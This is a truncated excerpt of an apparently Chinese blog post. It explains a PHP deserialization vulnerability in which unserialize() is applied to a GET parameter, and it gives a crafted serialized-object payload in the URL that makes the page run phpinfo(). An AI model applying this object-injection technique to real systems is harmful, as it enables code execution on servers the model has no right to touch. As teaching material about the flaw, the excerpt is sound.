摘要： fn); return $r($this->str); }}if($_GET['url']) unserialize($_GET['url']) && die();show_source(__FILE__);?>所以只要我们提交一个$o=newtest; $o->str='phpinfo()';那么是不是就会起到执行phpinfo呢？所以转换一下 xx.php?url=O:4:"test":1:{s:3:"str";s:9:"phpinfo()";} 就 阅读全文